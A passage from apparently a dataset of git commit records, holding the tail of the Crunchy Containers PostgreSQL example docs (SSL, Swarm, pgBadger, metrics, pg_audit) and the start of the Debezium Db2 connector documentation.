following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/postgres-gis\n.\/run.sh\n....\n\nEnter the following command to connect to the postgres-gis container that is\nmapped to your local port 12000:\n....\npsql -h localhost -U testuser -p 12000 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/postgres-gis\n.\/run.sh\n....\n\n=== Custom Configuration\n\nYou can use your own version of the SQL file `setup.sql` to customize\nthe initialization of database data and objects when the container and\ndatabase are created.\n\nThis works by placing a file named `setup.sql` within the `\/pgconf` mounted volume\ndirectory. Portions of the `setup.sql` file are required for the container\nto work; please see comments within the sample `setup.sql` file.\n\nIf you mount a `\/pgconf` volume, crunchy-postgres will look at that directory\nfor `postgresql.conf`, `pg_hba.conf`, `pg_ident.conf`, SSL server\/ca certificates and `setup.sql`.\nIf it finds one of them it will use that file instead of the default files.\n\n==== Docker\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/custom-config\n.\/run.sh\n....\n\n=== SSL Authentication\n\nThis example shows how you can configure PostgreSQL to use SSL for\nclient authentication.\n\nThe example requires SSL certificates and keys to be created. Included in\nthe examples directory is a script to create self-signed certificates (server\nand client) for the example: `$CCPROOT\/examples\/ssl-creator.sh`.\n\nThe example creates a client certificate for the user `testuser`. Furthermore,\nthe server certificate is created for the server name `custom-config-ssl`.\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config-ssl\n.\/run.sh\n....\n\nAnd the example can be run in the following directory for the Kubernetes and OpenShift environments:\n....\ncd $CCPROOT\/examples\/kube\/custom-config-ssl\n.\/run.sh\n....\n\nA required step to make this example work is to define\nin your `\/etc\/hosts` file an entry that maps `custom-config-ssl`\nto the service IP address for the container.\n\nFor instance, if your service has an address as follows:\n....\n${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\ncustom-config-ssl 172.30.211.108 <none> 5432\/TCP\n....\n\nThen your `\/etc\/hosts` file needs an entry like this:\n....\n172.30.211.108 custom-config-ssl\n....\n\nFor production Kubernetes and OpenShift installations, it will likely be preferred for DNS\nnames to resolve to the PostgreSQL service name and generate\nserver certificates using the DNS names instead of the example\nname `custom-config-ssl`.\n\nIf as a client it's required to confirm the identity of the server, `verify-full` can be\nspecified for `ssl-mode` in the connection string. This will check if the server and the\nserver certificate have the same name. Additionally, the proper connection parameters\nmust be specified in the connection string for the certificate information required to\ntrust and verify the identity of the server (`sslrootcert` and `sslcrl`), and to\nauthenticate the client using a certificate (`sslcert` and `sslkey`):\n\n....\npsql \"postgresql:\/\/testuser@custom-config-ssl:5432\/userdb?\\\nsslmode=verify-full&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nTo connect via IP, `sslmode` can be changed to `require`. This will verify the server\nby checking the certificate chain up to the trusted certificate authority, but will not\nverify that the hostname matches the certificate, as occurs with `verify-full`. The same\nconnection parameters as above can be then provided for the client and server certificate\ninformation.\n\n....\npsql \"postgresql:\/\/testuser@IP_OF_PGSQL:5432\/userdb?\\\nsslmode=require&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nYou should see a connection that looks like the following:\n....\npsql (10.5)\nSSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)\nType \"help\" for help.\n\nuserdb=>\n....\n\n=== Docker Swarm\n\nThis example shows how to run a primary and replica database\ncontainer on a Docker Swarm (v.1.12) cluster.\n\nFirst, set up a cluster. The Kubernetes libvirt coreos cluster\nexample works well; see link:http:\/\/kubernetes.io\/docs\/getting-started-guides\/libvirt-coreos\/[coreos-libvirt-cluster.]\n\nNext, on each node, create the Swarm using these\nlink:https:\/\/docs.docker.com\/engine\/swarm\/swarm-tutorial\/create-swarm\/[Swarm Install instructions.]\n\nInclude this command on the manager node:\n....\ndocker swarm init --advertise-addr 192.168.10.1\n....\n\nThen this command on all the worker nodes:\n....\n docker swarm join \\\n --token SWMTKN-1-65cn5wa1qv76l8l45uvlsbprogyhlprjpn27p1qxjwqmncn37o-015egopg4jhtbmlu04faon82u \\\n 192.168.10.1.37\n....\n\nBefore creating Swarm services, it is necessary\nto define an overlay network to be used by the services you will\ncreate. This can be done as follows:\n....\ndocker network create --driver overlay crunchynet\n....\n\nWe want to have the primary database always placed on\na specific node. This is accomplished using node constraints\nas follows:\n....\ndocker node inspect kubernetes-node-1 | grep ID\ndocker node update --label-add type=primary 18yrb7m650umx738rtevojpqy\n....\n\nIn the above example, the `kubernetes-node-1` node with ID\n`18yrb7m650umx738rtevojpqy` has a user defined label of *primary* added to it.\nThe primary service specifies *primary* as a constraint when created; this\ntells Swarm to place the service on that specific node. The replica specifies\na constraint of `node.labels.type != primary` to have the replica\nalways placed on a node that is not hosting the primary service.\n\n==== Docker\n\nAfter you set up the Swarm cluster, you can then run this example as follows on the *Swarm Manager Node*:\n....\ncd $CCPROOT\/examples\/docker\/swarm-service\n.\/run.sh\n....\n\nYou can then find the nodes that are running the primary and replica containers\nby:\n....\ndocker service ps primary\ndocker service ps replica\n....\n\nYou can also scale up the number of *replica* containers.\n....\ndocker service scale replica=2\ndocker service ls\n....\n\nVerify you have two replicas within PostgreSQL by viewing the `pg_stat_replication` table.\nThe password is *password* by default when logged into the `kubernetes-node-1` host:\n....\ndocker exec -it $(docker ps -q) psql -U postgres -c 'table pg_stat_replication' postgres\n....\n\nYou should see a row for each replica along with its replication status.\n\n== Failover\n\n=== Watch\n\nCrunchy Watch is an application wrapped in a container that watches a PostgreSQL\nprimary database and waits for a failure to occur, at which point a failover is\nperformed to promote a replica.\n\nThe crunchy-watch container, while originally part of the Container Suite, has been\nsplit out into its own project. More information on the Watch container and it's\ncapabilities can be found in the new project repository located at\nhttps:\/\/github.com\/CrunchyData\/crunchy-watch.\n\n== Metrics and Performance\n\n=== pgBadger\n\npgbadger is a PostgreSQL tool that reads the log files from a specified database\nin order to produce a HTML report that shows various PostgreSQL statistics and graphs.\nThis example runs the pgbadger HTTP server against a crunchy-postgres container and\nillustrates how to view the generated reports.\n\nThe port utilized for this tool is port 14000 for Docker environments and port 10000\nfor Kubernetes and OpenShift environments.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container will run and provide a simple HTTP\ncommand you can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/127.0.0.1:14000\/api\/badgergenerate\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container will run and provide a simple HTTP\ncommand you can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/pgbadger:10000\/api\/badgergenerate\n....\n\nYou can view the database container logs using these commands:\n....\n${CCP_CLI} logs pgbadger -c pgbadger\n${CCP_CLI} logs pgbadger -c postgres\n....\n\n=== Metrics Collection\n\nYou can collect various PostgreSQL metrics from your database\ncontainer by running a crunchy-collect container that points\nto your database container.\n\nThis example starts up 5 containers:\n\n * Collect (crunchy-collect)\n * Grafana (crunchy-grafana)\n * PostgreSQL (crunchy-postgres)\n * Prometheus (crunchy-prometheus)\n\nEvery 5 seconds by default, Prometheus will scrape the Collect container\nfor metrics. These metrics will then be visualized by Grafana.\n\nBy default, Prometheus detects which environment its running on (Docker, Kubernetes, or OpenShift Container Platform)\nand applies a default configuration. If this container is running on Kubernetes or OpenShift Container Platform,\nit will use the Kubernetes API to discover pods with the label `\"crunchy-collect\": \"true\"`.\n\nThe collect container *must* have this label to be discovered in these environments.\nAdditionally, the collect container uses a special PostgreSQL role `ccp_monitoring`.\nThis user is created by setting the `PGMONITOR_PASSWORD` environment variable on the\nPostgreSQL container.\n\nDiscovering pods requires a cluster role service account. See the\nlink:https:\/\/github.com\/crunchydata\/crunchy-containers\/blob\/master\/examples\/kube\/metrics\/metrics.json[Kubernetes and OpenShift]\nmetrics JSON file for more details.\n\nFor Docker environments the collect hostname must be specified as an environment\nvariable.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo start this set of containers, run the following:\n....\ncd $CCPROOT\/examples\/docker\/metrics\n.\/run.sh\n....\n\nYou will be able to access the Grafana and Prometheus services from the following\nweb addresses:\n\n * Grafana (http:\/\/0.0.0.0:3000)\n * Prometheus (http:\/\/0.0.0.0:9090)\n\nThe crunchy-postgres container is accessible on port *5432*.\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/metrics\n.\/run.sh\n....\n\nIt's required to use `port-forward` to access the Grafana dashboard. To start the\nport-forward, run the following command:\n\n....\n${CCP_CLI} port-forward metrics 3000:3000\n${CCP_CLI} port-forward metrics 9090:9090\n....\n\n * Grafana dashboard can be then accessed from `http:\/\/127.0.0.01:3000`\n * Prometheus dashboard can be then accessed from `http:\/\/127.0.0.01:9090`\n\nYou can view the container logs using these command:\n....\n${CCP_CLI} logs -c grafana metrics\n${CCP_CLI} logs -c prometheus metrics\n${CCP_CLI} logs -c collect primary-metrics\n${CCP_CLI} logs -c postgres primary-metrics\n${CCP_CLI} logs -c collect replica-metrics\n${CCP_CLI} logs -c postgres replica-metrics\n....\n\n=== pg_audit\n\nThis example provides an example of enabling pg_audit output.\nAs of release 1.3, pg_audit is included in the crunchy-postgres\ncontainer and is added to the PostgreSQL shared library list in\n`postgresql.conf`.\n\nGiven the numerous ways pg_audit can be configured, the exact\npg_audit configuration is left to the user to define. pg_audit\nallows you to configure auditing rules either in `postgresql.conf`\nor within your SQL script.\n\nFor this test, we place pg_audit statements within a SQL script\nand verify that auditing is enabled and working. If you choose\nto configure pg_audit via a `postgresql.conf` file, then you will\nneed to define your own custom file and mount it to override the\ndefault `postgresql.conf` file.\n\n==== Docker\n\nRun the following to create a database container:\n....\ncd $CCPROOT\/examples\/docker\/pgaudit\n.\/run.sh\n....\n\nThis starts an instance of the pg_audit container (running crunchy-postgres)\non port 12005 on localhost. The test script is then automatically executed.\n\nThis test executes a SQL file which contains pg_audit configuration\nstatements as well as executes some basic SQL commands. These\nSQL commands will cause pg_audit to create log messages in\nthe `pg_log` log file created by the database container.\n\n==== Kubernetes and OpenShift\n\nRun the following:\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/run.sh\n....\n\nThis script will create a PostgreSQL pod with the pgAudit extension configured and ready\nto use\n\nOnce the pod is deployed successfully run the following command to test the extension:\n\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/test-pgaudit.sh\n....\n\nThis example has been configured to log directly to stdout of the pod. To view the PostgreSQL logs\nrun the following:\n\n....\n$CCP_CLI logs pgaudit\n....\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c33e46cffad2ce6b689146bee12bd997648ae28c","subject":"DBZ-2814 Remove Db2 Tech prev\/incubating statements for promotion to GA.","message":"DBZ-2814 Remove Db2 Tech prev\/incubating statements for promotion to GA.\n","repos":"jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-db2\"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into \"capture mode\". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. Applications and services consume change events from these topics.\n\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS. To use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product. However, IIDR does not need to be installed.\n\nThe Db2 connector has been tested with Db2\/Linux {linux-version}. It is expected that the connector would also work on Windows, AIX and zOS.\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector is organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2`s replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list` let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optional, releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names 